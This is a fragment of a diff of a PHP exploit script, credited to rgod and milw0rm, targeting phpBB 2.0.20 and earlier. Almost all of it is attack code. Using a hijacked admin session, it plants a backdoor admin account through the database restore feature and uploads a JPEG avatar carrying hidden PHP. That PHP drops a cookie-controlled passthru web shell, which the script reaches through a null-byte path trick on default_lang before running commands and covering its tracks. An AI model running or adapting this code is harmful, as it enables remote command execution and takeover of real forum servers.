"Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock); - #debug - #echo "\r\n".$html; - -} - -$host=$argv[1]; -$path=$argv[2]; -$cmd="";$port=80;$proxy=""; -for ($i=4; $i<=$argc-1; $i++){ -$temp=$argv[$i][0].$argv[$i][1]; -if (($temp<>"-p") and ($temp<>"-P")) -{$cmd.=" ".$argv[$i];} -if ($temp=="-p") -{ - $port=str_replace("-p","",$argv[$i]); -} -if ($temp=="-P") -{ - $proxy=str_replace("-P","",$argv[$i]); -} -} -$cmd=urlencode($cmd); -if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} -if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - - - -echo "step 0 -> check if suntzu.php is already installed...\r\n"; -$packet ="GET ".$p."suntzu.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=".$cmd.";\r\n"; -$packet.="Connection: Close\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (strstr($html,"56789")) -{ - echo "Exploit succeeded...\r\n"; - $temp=explode("56789",$html); - die("\r\n".$temp[1]."\r\n"); -} - -echo "Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...\r\n"; -$data="username=suntzu"; -$data.="&password=suntzu"; -$data.="&redirect=".urlencode("admin/index.php?admin=1"); -$data.="&admin=1"; -$data.="&login=Log+in"; -$packet="POST ".$p."login.php HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."/login.php\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: 
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(" ",$temp[3]); -$cookie=$temp2[0]; -$temp2=explode(" ",$temp[4]); -$cookie.=" ".$temp2[0]; -$temp=explode("admin=1&sid=",$html); -$temp2=explode("\n",$temp[1]); -$session_id=trim($temp2[0]); -if (($cookie=='') | ($session_id=='')) { -echo "step 0c -> query database to create a \"suntzu\" user with password \"suntzu\"...\r\n"; -$session_id=trim($argv[3]); -//usually admin user_id is "2", so you need only session id... however, if you have admin cookie, specify it literally -$cookie="phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid="; -$cookie.=$session_id.";"; -$sql=" -# -# let's create a new admin user -# - -INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level,user_email) VALUES ('999999','1','suntzu','d33d57efba4c05808b5d16532f9d1567','1','suntzu\@fakemail.com'); - -"; - -$data='-----------------------------7d62702f250530 -Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql"; -Content-Type: text/plain - -'.$sql.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="perform" - -restore ------------------------------7d62702f250530 -Content-Disposition: form-data; name="restore_start" - -Start Restore ------------------------------7d62702f250530-- -'; - -$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." 
HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (eregi("The Database has been successfully restored",$html)) -{ -echo "Done...\r\n"; -} -else -{ -die("Unable to modify table... maybe wrong admin sid\r\n"); -} -} -else -{ -echo "Cookie ->".$cookie."\r\n"; -echo "sid ->".urlencode($session_id)."\r\n\r\n"; -} - -echo "Step 1 -> Login as suntzu...\r\n"; -$data="username=suntzu"; -$data.="&password=suntzu"; -$data.="&redirect=".urlencode("admin/index.php?admin=1"); -$data.="&admin=1"; -$data.="&login=Log+in"; -$packet="POST ".$p."login.php HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."/login.php\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -$temp=explode("Set-Cookie: ",$html); -$temp2=explode(" ",$temp[3]); -$cookie=$temp2[0]; -$temp2=explode(" ",$temp[4]); -$cookie.=" ".$temp2[0]; -echo 
"Cookie ->".$cookie."\r\n"; -$temp=explode("admin=1&sid=",$html); -$temp2=explode("\n",$temp[1]); -$session_id=trim($temp2[0]); -echo "sid ->".urlencode($session_id)."\r\n\r\n"; -if (($cookie=='') | ($session_id=='')) {die("Unable to login...");} - -echo "step 2 -> enable avatar uploads, if not enabled yet...\r\n"; -$data='-----------------------------7d62702f250530 -Content-Disposition: form-data; name="server_name" - -'.$host.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="server_port" - -'.$port.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="script_path" - -'.$path.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="sitename" - -yourdomain.com ------------------------------7d62702f250530 -Content-Disposition: form-data; name="site_desc" - -A _little_ text to describe your forum ------------------------------7d62702f250530 -Content-Disposition: form-data; name="board_disable" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="require_activation" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="enable_confirm" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_autologin" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="max_autologin_time" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="board_email_form" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="flood_interval" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="search_flood_interval" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="max_login_attempts" - -99 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="login_reset_time" - -30 
------------------------------7d62702f250530 -Content-Disposition: form-data; name="topics_per_page" - -50 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="posts_per_page" - -15 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="hot_threshold" - -25 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="default_style" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="override_user_style" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="default_lang" - -english ------------------------------7d62702f250530 -Content-Disposition: form-data; name="default_dateformat" - -D M d, Y g:i a ------------------------------7d62702f250530 -Content-Disposition: form-data; name="board_timezone" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="gzip_compress" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="prune_enable" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="cookie_domain" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="cookie_name" - -phpbb2mysql ------------------------------7d62702f250530 -Content-Disposition: form-data; name="cookie_path" - -/ ------------------------------7d62702f250530 -Content-Disposition: form-data; name="cookie_secure"; - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="session_length" - -3600 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="privmsg_disable" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="max_inbox_privmsgs" - -50 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="max_sentbox_privmsgs" - -25 ------------------------------7d62702f250530 -Content-Disposition: 
form-data; name="max_savebox_privmsgs" - -50 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="max_poll_options" - -50 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_html" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_html_tags" - -b,i,u,pre ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_bbcode" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_smilies" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="smilies_path" - -images/smiles ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_sig" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="max_sig_chars" - -255 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_namechange" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_avatar_local" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_avatar_remote" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allow_avatar_upload" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatar_filesize" - -6144 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatar_max_height" - -100 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatar_max_width" - -100 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatar_path" - -images/avatars ------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatar_gallery_path" - -images/avatars/gallery ------------------------------7d62702f250530 -Content-Disposition: form-data; 
name="coppa_fax" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="coppa_mail" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="board_email" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="board_email_sig" - -Thanks, The Suntzu S.p.A. ------------------------------7d62702f250530 -Content-Disposition: form-data; name="smtp_delivery" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="smtp_host" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="smtp_username" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="smtp_password" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="submit" - -Submit -----------------------------7d62702f250530-- -'; - -$packet="POST ".$p."admin/admin_board.php?sid=".$session_id." HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."admin/admin_board.php?sid=".$session_id."\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (eregi("Forum Configuration Updated Successfully",$html)) -{ -echo "Done...\r\n"; -} -else -{echo("Unable to modify configuration...");} - -echo "step 3 -> upload an avatar with php code as EXIF metadata content...\r\n"; -$avatar= 
-chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f). -chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70). -chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22). -chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70). -chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29). -chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73). -chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f). -chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f). -chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74). -chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73). -chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f). -chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29). -chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74). -chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71). -chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70). -chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24). -chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). -chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72). -chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65). -chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f). -chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d). -chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20). -chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61). -chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c). 
-chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45). -chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65). -chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38). -chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28). -chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63). -chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75). -chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70). -chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d). -chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). -chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). -chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). -chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). 
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). -chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). -chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). -chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). -chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08). -chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). -chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00). -chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). -chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03). -chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f). 
-chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00); - -/* -this image has this code inside as EXIF metadata content -<?php -$fp=fopen("suntzu.php","w"); -fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>"); -fclose($fp); -chmod("suntzu.php",777); -?> -*/ - -$data='-----------------------------7d62702f250530 -Content-Disposition: form-data; name="username" - -suntzu ------------------------------7d62702f250530 -Content-Disposition: form-data; name="email" - -suntzu@fakemail.com ------------------------------7d62702f250530 -Content-Disposition: form-data; name="cur_password" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="new_password" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="password_confirm" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="icq" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="aim" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="msn" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="yim" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="website" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="location" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="occupation" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="interests" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="signature" - -suntzu giving you the pain ------------------------------7d62702f250530 -Content-Disposition: form-data; name="viewemail" - -1 ------------------------------7d62702f250530 
-Content-Disposition: form-data; name="hideonline" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="notifyreply" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="notifypm" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="popup_pm" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="attachsig" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allowbbcode" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allowhtml" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="allowsmilies" - -1 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="language" - -italian ------------------------------7d62702f250530 -Content-Disposition: form-data; name="style" - -1047 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="timezone" - -2 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="dateformat" - -D M d, Y g:i a ------------------------------7d62702f250530 -Content-Disposition: form-data; name="MAX_FILE_SIZE" - -100000 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatar"; filename="whatever.jpeg"; -Content-Type: image/pjpeg - -'.$avatar.' 
------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatarurl" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="avatarremoteurl" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="mode" - -editprofile ------------------------------7d62702f250530 -Content-Disposition: form-data; name="agreed" - -true ------------------------------7d62702f250530 -Content-Disposition: form-data; name="coppa" - -0 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="user_id" - -999999 ------------------------------7d62702f250530 -Content-Disposition: form-data; name="current_email" - - ------------------------------7d62702f250530 -Content-Disposition: form-data; name="submit" - -Submit ------------------------------7d62702f250530-- -'; - -$packet="POST ".$p."profile.php HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -sleep(1); - -echo "step 4 -> retrieve new filename for avatar from profile page...\r\n"; -$packet="GET ".$p."profile.php?mode=editprofile HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -$temp=explode("images/avatars/",$html); -$temp2=explode("\"",$temp[1]); 
-$avatar_name=$temp2[0]; -echo "avatar filename -> ".$avatar_name."\r\n"; -if ($avatar_name=='') {die("Unable to retrieve filename...");} - -echo "step 5 -> replace default_lang value in phpbb_config table with our path to shell, breaking path with a null char...\r\n"; -$sql=' -# -# our path to avatar, using a null char to break the path -# - -UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/'.$avatar_name.'",CHAR(0)) where config_name="default_lang"; - -'; - -$data='-----------------------------7d62702f250530 -Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql"; -Content-Type: text/plain - -'.$sql.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="perform" - -restore ------------------------------7d62702f250530 -Content-Disposition: form-data; name="restore_start" - -Start Restore ------------------------------7d62702f250530-- -'; -$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n"; -$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; -$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n"; -$packet.="Accept-Language: it\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; -$packet.="Accept-Encoding: gzip, deflate\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Connection: Close\r\n"; -$packet.="Cache-Control: no-cache\r\n"; -$packet.="Cookie: ".$cookie."\r\n\r\n"; -$packet.=$data; -sendpacketii($packet); -if (eregi("The Database has been successfully restored",$html)) -{ -echo "Done...\r\n"; -} -else -{ -die("Unable to modify table..."); -} - -echo "step 6 -> execute code inside jpeg file\r\n"; -$packet="GET ".$p."faq.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; 
-$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -sleep(1); - -echo "step 7 -> Launch commands...\r\n"; -$packet="GET ".$p."suntzu.php HTTP/1.0\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Cookie: cmd=dir;\r\n"; -$packet.="Connection: Close\r\n\r\n"; -sendpacketii($packet); -if (strstr($html,"56789")) -{ - echo "Exploit succeeded...\r\n"; - $temp=explode("56789",$html); - echo "\r\n".$temp[1]."\r\n"; -} -else -{ - echo "Exploit failed...however you will be able to login as admin\r\n"; - echo "with username \"suntzu\" and password \"suntzu\"\r\n"; -} - - -echo "step 8 -> restore phpbb_config with the old value to keep the board accessible\r\n"; -$sql=' -# -# old value for default_lang -# - -UPDATE phpbb_config SET config_value="english" where config_name="default_lang"; - -'; - -$data='-----------------------------7d62702f250530 -Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql"; -Content-Type: text/plain - -'.$sql.' ------------------------------7d62702f250530 -Content-Disposition: form-data; name="perform" - -restore ------------------------------7d62702f250530 -Content-Disposition: form-data; name="restore_start" - -Start Restore ------------------------------7d62702f250530-- -'; -$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." 
HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
-$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
-$packet.="Accept-Language: it\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (eregi("The Database has been successfully restored",$html))
-{
-echo "Done...\r\n";
-}
-else
-{
-die("Unable to modify table...");
-}
-?>
-
-# milw0rm.com [2006-05-13]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "PhpBB <= v2.0.20 \"Admin/Restore Database/default_lang remote commands execution\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n";
+echo "-> you need an admin sid, works regardless of magic_quotes_gpc settings\r\n";
+echo "tested and working against a fresh PhpBB installation\r\n\r\n";
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path sid cmd OPTIONS\r\n";
+echo "host: target server (ip/hostname)\r\n";
+echo "path: path to PhpBB\r\n";
+echo "sid: session id\r\n";
+echo "cmd: a shell command\r\n";
+echo "Options:\r\n";
+echo " -p[port]: specify a port other than 80\r\n";
+echo " -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
